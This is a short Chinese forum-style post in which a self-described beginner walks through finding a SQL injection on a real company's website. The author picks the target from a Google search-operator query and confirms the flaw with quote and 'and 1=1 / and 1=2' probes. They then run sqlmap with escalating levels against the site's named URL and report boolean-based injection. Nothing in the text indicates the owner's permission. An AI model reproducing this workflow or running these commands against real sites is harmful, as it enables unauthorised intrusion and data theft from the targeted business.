小白挖洞,各位大佬勿喷
第一步:浏览器中输入:inurl:ask?id=29公司(为什么是id=29呢,这个是随便写的)
点下面福建泉州德源轴承厂(因为上面的点过有waf,先做下简单的测试)
看到id=29,后面插入单引号闭合看下
页面显示不正常
尝试and 1=1
页面正常
尝试and 1=2
页面显示不正常,说明存在sql注入
直接拿去sqlmap跑包
sqlmap -u www.xadyzc.cn/productshow.asp?id=29 --batch
第一次跑没跑出来,尝试加下等级
sqlmap -u www.xadyzc.cn/productshow.asp?id=29 --batch --level=3
跑出来了,存在布尔注入
后面可以再跑数据库等,但是到这一步基本上OK了